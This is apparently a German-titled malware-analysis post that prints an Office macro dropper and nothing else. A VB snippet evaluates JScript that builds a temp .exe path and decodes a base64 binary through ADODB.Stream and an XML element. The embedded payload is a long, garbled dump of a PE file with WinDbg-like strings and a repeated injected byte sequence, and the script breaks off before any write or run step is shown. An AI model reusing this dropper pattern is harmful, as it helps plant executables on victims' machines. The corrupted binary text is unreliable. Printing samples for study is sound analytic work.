Malware-Analyse Office-Makro (.Eval)

[src=vb]
Set oScript = CreateObject(MSScriptControl.ScriptControl)
oScript.Language = "Jscript"
oScript.Eval (siehe unten)
var fso = new ActiveXObject('Scripting.FileSystemObject');
var tmp_path = fso.GetSpecialFolder(2) + '\\' + fso.GetTempName();
tmp_path = tmp_path.replace('.tmp', '.exe');
var stream = new ActiveXObject('ADODB.Stream');
stream.Open();
stream.Type = 1;
stream.Position = 0;
var xmlObj = new ActiveXObject('MSXml2.DOMDocument');
var docElement = xmlObj.createElement('Base64Data');
docElement.dataType = 'bin.base64';
docElement.text = '';
docElement.text = 'MZ@ !L!This program cannot be run in DOS mode.

$}%ovovovvov@vov@vov@vov@vovnvov@vov@vov@vovRichovPELR"@P@@' K@.text>@ `.data4YP,D@.idataTp@@.rsrc,jhpI^^O*^uVhpI^m@@.reloc^^`@B7AD@(@N@@@@6@@&@A@{@@@)@D@_@z@@@@@@y@@k@@@a@@@^@1@@y@@@@@@8@ D!DR#TT0zDzDFF,jhpI^^O*^uVhpI^m#EOzFRaw argsFunc infoSourceAddrsHeadingsNonvolatile regsFrame numsSource argsMoreLessCopy stack to clipboardToolbarWindow32WARNING:0x`%I64xLISTBOXg 0x%I64xb$B[F@Z@iA@PAA@3jAsjA@7A=AGA@@fApAfAO A@@2@s@@@ A@ As!As!As@@=AjAjA@@ A@@?@GA@7AGA@@#A
%A0@jA@&Start&Prev&Next&Au,jhpI^^O*^uVhpI^mto refresh&RefreshA&dd to Recent CommandsReBarWindow32COMBOBOXCommand:StartPrevNext}@W@-B+@@@@K@@@@BBQAYA@B@6B@@@@@@ A A AX@X@P@C@@1@@@@ A@>@o"Ap@@NBGA@@#A&@A&AB@@7Awindbg ANSI Command Tree 1.0windbg ANSI Command Tree 1.1bodytitled@@iA;jCPAAiA3jAsjA@7A=AGAQAYAfApAfAO A@@@@@@ A A A@s!AxjC!A=AjAjA@@,jhpI^^O*^uVhpI^m A@@o"AjC@@GAz"A"A#A
%AA&AtkC@ ACA@&Add to command output&Clear command output&Open selected source fileSet &selection to user colorsChoose text color and &recolor selection...&Word wrap&Mark current location&Go to markSTATICDebuggee not connectedDebuggee is running...Input>w%ws
MarkerUsage: .open ,jhpI^^O*^uVhpI^m[<opts>] <filename>
Invalid module address expression
Unable to find '%s'
.beepwindbg> %s%c%s
.browse.cls/s.cmdtree.flash_on_breakon1offFlash iconic frame window on break: %s
.force_win_path.force_win_path requires an argument
Force window path to '%s'
Under window does not have a valid file pa,jhpI^^O*^uVhpI^mth
.hhdbgerr.hold_outputHold output until event: %s
.idle_cmdOut of memory
No idle command
Execute when idle: %s
.lsrcpath.lsrcpath+.lsrcfix.lsrcfix+Local source search path is: %s
lsrcpath and lsrcfix are only enabled for remote clients
.open.scroll_prefs%i%iInvalid scroll preferences
Scroll ,jhpI^^O*^uVhpI^mpreferences: %d line(s) before, %d line(s) after
.serverServer '%s'.sound_notify.suspend_uiNon-command-window refresh: %s
.write_cmd_histUsage: .write_cmd_hist <filename>
Wrote command history to '%s'
Unable to write command history
.wtitleUsage: .wtitle <title_string>


@@X@@-@@@P@@
@@L@n@QAYA@@,jhpI^^O*^uVhpI^m@@@@@t@@@\@ A As!As!A@@=A @i@@@@@ @o"A;@AkAGA@A#A
%AAA@ToolbarDock windowMove to new dockSet as tab-dock target for window typeAlways floatingMove with frameProperties...HelpClose Ctrl+F4OpenOpen in New WindowCopy Commandbc %dbp %sSysTabControl32tooltips_class32 - &Windows...UndockD,jhpI^^O*^uVhpI^mock%s %suiA@iAPAPAAiA3jAsjA@7A=AGAQAYAfApAfAO A@@@@@@ A A As!As!A!A!A=AjAjA@@ A@@o"AGA@7AGAz"A"A#A
%AA&AjA@DDDDDDDD(AA@APAPAAAA
A@7A=AGAQAYAfApAfAO A@@@@@@ A A As!As!A!A!A=A7A!A@@ A@@o"AGA@7AGAz"A"A#A
%AA&A7A@Customize...RegValueRetrievingError%lf%I64d%x`%08x,jhpI^^O*^uVhpI^m%I64xUnknownd@lAfAAYAAAA A@7A=AGA@eAfApAfAO A@@@*oA@@ A A As!As!AoApA=AjA'qA@@ A@@o"AAPqA7AGAz"A"A#A
%AA&A;A@YANAAAwAKAxAsAPrevious pageNext pageGo to current addressDisassemble before current instructionHighlight instructions from current source lineShow source line for each instructionShow source fil,jhpI^^O*^uVhpI^me for each instructionnt!DbgBreakPointWithStatus@$scopeipEDITOffset:Previousdisassembly

o{A{A-BBBBiA3jA3B!AsBBBQAYA@B@6B@@AA@@ A8~A As!As!AZAsA=AjAA@@ AA[Ao"AAANBGAuAA#A
%AAB@@VASet instruction pointer to current line Ctrl+Shift+IEdit this file...CopyCopy file path to clipboardEval,jhpI^^O*^uVhpI^muate selection Ctrl+Shift+VDisplay selected type Ctrl+Shift+YOpen memory window for selectionAdd selection to watch windowDisassemble at current lineSelect source language...!@@masm(`%s%s:%d+`)@@masm(`%s:%d+`)bm %s@@masm(@!"%s")@@masm(`%s!%s:%d+`)bu %sr$ip = @@masm(`%s:%d+`)?? /l 2000 /u /s /q /p /E /C %,jhpI^^O*^uVhpI^ms:
"%s"
+0x%I64xo{A@-BBBBiA3jA3B!AsBBBQAYA@B@6B@@AAAA]AAAAAA
A=AjA@@@ A@AAo"AAA'AGAfAAA2AA&AAAA>ADock %d - WinDbg DockAAhA]A{A@SysListView32@@fAAYAAAA A@7A=AGA@eAfApAfAO A@@@@@@ A A As!As!AAA=AjAjA@@ A@@o"AAA7AGAz"A"A#A
%AA&A;A@YANAAACAKAiAsA<out of memory ,jhpI^^O*^uVhpI^mfor DML conversion>ERROR: Symbol type name overflow
struct class union ERROR: Symbol is not in memory
0x%I64xERROR: Symbol location overflow
windbg> [%s] %s
EndSessionCommand Line: Engine CreateClientEngine QueryInterfaceEngine local clientEngine output capture clientEngine callbacksEngine CreateSymbolGroupEngine GetScopeSymbolGroupEngine ,jhpI^^O*^uVhpI^mGetRadixDebug target initialization failed, 0x%X
Unable to get debuggee pointer size, 0x%X
?Err*BUSY*Unable to get debuggee type, 0x%X
Unable to get execution status, 0x%X
WaitForEvent failed
Engine thread wait failed, 0x%X
&<>"kX.THtMDN(g9hH}J% tTS)N3I2V:N]/P6Ou/AK,jhpI^^O*^uVhpI^mmRr~O(>_i^G~XB(AA2AiAGAKAmAAANBAGAA(AuA>A A(AAeAA,P6Isl-A(AAAAAA(AAxArgVDJ%+eQ<cL&N4^vL%0*I64d% *I64d% I64d%0*.*I64o%0*.*I64u%0*.*I64x%02.2x% *.*I64o% *.*I64u% *.*I64x%I64o%I64u% 12.6e% 21.14leASCIIUnicodeBitByteShortShort HexShort UnsignedLongLong HexLong UnsignedQuadQua,jhpI^^O*^uVhpI^md HexQuad UnsignedReal (32-bit)Real (64-bit)Real (10-byte)Real (16-byte)Pointer and SymbolMemory Options%dInternalIsaEisaMicroChannelTurboChannelPCIBusVMEBusNuBusPCMCIABusCBusMPIBusMPSABusProcessorInternalInternalPowerBusPNPISABusPNPBusIntel VM Control StructureCmosEisaConfigurat,jhpI^^O*^uVhpI^mionPosCbusConfigurationPCIConfigurationVMEConfigurationNuBusConfigurationPCMCIAConfigurationMPIConfigurationMPSAConfigurationPNPISAConfigurationSgiInternalConfigurationVirtual:Physical:Control:I/O:MSR:Bus data:&Previous page&Next page&Auto-fit columns Display format:??o{A+B-BBBBiA3jA3B!As,jhpI^^O*^uVhpI^mBBBQAYA@B@6B!A3BBB@
@ A A As!As!ABB=AjAB@@ ABBo"AYB BNBGA$B$B#A
%A_%BB@@7A$;@8;@L;@`;@l;@x;@CommandIdEnabled: Unhandled %d (%X)
f@h@i@j@k@l@m@t@u@v@y@@@@@@@@@@@@@@@@@@@HAJAAAAAAAAAAAAAAAAAgggAAAAAAA[B@:Bd:B:B`;B=B>BI>Bz>Benableddisabledoutputignorehandlednot ,jhpI^^O*^uVhpI^mhandledNoneCOFFCodeViewPDBExportDeferredSymDIA<No workspace>Browse for Path;Pending: ~%d%s~%u%sbu %s "j(%s) '.echo \"Breakpoint hit, condition %s\"' ; 'gc'"%sbu %sbc *b%c %dNo servers registered,Server=Connect to Remote Stub ServerCreateUiInterfacesUnable to recreate UI interfaces
.reload,jhpI^^O*^uVhpI^m_NT_DEBUG_PORTcom1_NT_DEBUG_BAUD_RATE115200f0_NT_DEBUG_1394_CHANNEL_NT_DEBUG_USB2_TARGETNAME_NT_DEBUG_NET_PORT50000_NT_DEBUG_NET_KEYKernel DebuggingUI GetSourcePathUI SetSourcePathSystem ProcessCorrupted Process Name0x%x %s%4d %sIncomplete process list0x%x%4dAccess denied, check debug pri,jhpI^^O*^uVhpI^mvilegeError 0x%08XUnable to connect to process serverUnable to get process IDs<Error 0x%08X><No information>%u - %s - %s%s - %s - %sException %08X - %s - %s%xNameEndTimestampChecksumSymbolsSymbol fileUnable to retrieve module list<Unable to get name><Unloaded>Invalid
(%08x)Unavailable%,jhpI^^O*^uVhpI^m08x.reload /f @"%s"Software\Microsoft\Windbg\Workspaces\%s%s - %sOpen WorkspaceSave Workspace As%sWorkspace '%s'Line %d0x%016I64x - Source file %s, line %dFor inline function: %s [%s + %u]>@>@>@?@?@?@0?@8?@>@>@l>@|>@>@>@.echotimestamps %dBad argument to sound_notify
Sound notification: system e,jhpI^^O*^uVhpI^mvent
Sound notification: file '%s'
Sound notification disabled
"?? /sdt@@masm(@$ip)ONOFFVerbose mode %s.
Engine is busy, try again
Unable to show version information, 0x%X
.restart.restart /fgghgng %stpgul+tl-tUnable to spawn debugger, %s
Debugger spawned, connect with
"%s"
cycle_s,jhpI^^O*^uVhpI^mpeedNOT breakinbreakinWill %s at next boot.
resyncProcessing initial command '%s'
<%s>%d %03d:%x d@FBiA;jCPAAiA3jAsjA@7A=AGAQAYAfApAfAO A@@@@@@ A A As!As!AxjC!A=AjAjA@@ A@@o"AjCB7AGAz"A"A#A
%AA&AtkC@BCABAssociate with file...End file assocation%s (%s)G]o{A@-BBBBiA3jA3B!AsBBBQAYA@B@6B@,jhpI^^O*^uVhpI^m@BAB@@ A A ABs!A2B!A=AjAjA@@ A@@o"AB@BGABB#A
%A$BB@@7AB@-BBBBiA3jA3B!AsBBBQAYA@B@6B@@@@@@ A A As!As!AFB!A=AjAjA@@ A@@o"AB@NBGAz"A"A#A
%AA&AB@@7A(@@)@@c++(&abstractenumstackallocaseventnamespacestaticbaseexplicitexternnullstructbreakswitchfinallyoperatorthisc,jhpI^^O*^uVhpI^masefixedoutthrowcatchoverrideforparamstryforeachprivateclassgotoprotectedconstifpubliccontinueimplicitreadonlyinrefunsafedefaultreturndelegateinterfaceusingdointernalsealedvirtualvoidelselockwhilecharbytesbyteshortushortintuintlongulongdoublefloatstring,jhpI^^O*^uVhpI^mboolobjectnewsizeoftypeofischeckedunchecked__cdecl__stdcall__fastcalltruefalse__ecount__bcount__xcount__in__in_ecount__in_bcount__in_xcount__out__out_ecount__out_bcount__out_xcount__out_ecount_part__out_bcount_part__out_xcount_part__out_ecount_full__out_bcount_full__out_xcount_fu,jhpI^^O*^uVhpI^mll__inout__inout_ecount__inout_bcount__inout_xcount__inout_ecount_part__inout_bcount_part__inout_xcount_part__inout_ecount_full__inout_bcount_full__inout_xcount_full__ecount_opt__bcount_opt__xcount_opt__in_opt__in_ecount_opt__in_bcount_opt__in_xcount_opt__out_opt__out_ecount_opt__out_bcount_opt,jhpI^^O*^uVhpI^m__
out_xcount_opt__out_ecount_part_opt__out_bcount_part_opt__out_xcount_part_opt__out_ecount_full_opt__out_bcount_full_opt__out_xcount_full_opt__inout_opt__inout_ecount_opt__inout_bcount_opt__inout_xcount_opt__inout_ecount_part_opt__inout_bcount_part_opt__inout_xcount_part_opt__inout_ecount_full_opt__inout,jhpI^^O*^uVhpI^m_bcount_full_opt__inout_xcount_full_opt__deref_ecount__deref_bcount__deref_xcount__deref_in__deref_in_ecount__deref_in_bcount__deref_in_xcount__deref_out__deref_out_ecount__deref_out_bcount__deref_out_xcount__deref_out_ecount_part__deref_out_bcount_part__deref_out_xcount_part__deref_out_ecount_full__,jhpI^^O*^uVhpI^mderef_out_bcount_full__deref_out_xcount_full__deref_inout__deref_inout_ecount__deref_inout_bcount__deref_inout_xcount__deref_inout_ecount_part__deref_inout_bcount_part__deref_inout_xcount_part__deref_inout_ecount_full__deref_inout_bcount_full__deref_inout_xcount_full__deref_ecount_opt__deref_bcount_opt__d,jhpI^^O*^uVhpI^meref_xcount_opt__deref_in_opt__deref_in_ecount_opt__deref_in_
bcount_opt__deref_in_xcount_opt__deref_out_opt__deref_out_ecount_opt__deref_out_bcount_opt__deref_out_xcount_opt__deref_out_ecount_part_opt__deref_out_bcount_part_opt__deref_out_xcount_part_opt__deref_out_ecount_full_opt__deref_out_bcount_full_op,jhpI^^O*^uVhpI^mt__deref_out_xcount_full_opt__deref_inout_opt__deref_inout_ecount_opt__deref_inout_bcount_opt__deref_inout_xcount_opt__deref_inout_ecount_part_opt__deref_inout_bcount_part_opt__deref_inout_xcount_part_opt__deref_inout_ecount_full_opt__deref_inout_bcount_full_opt
[/src]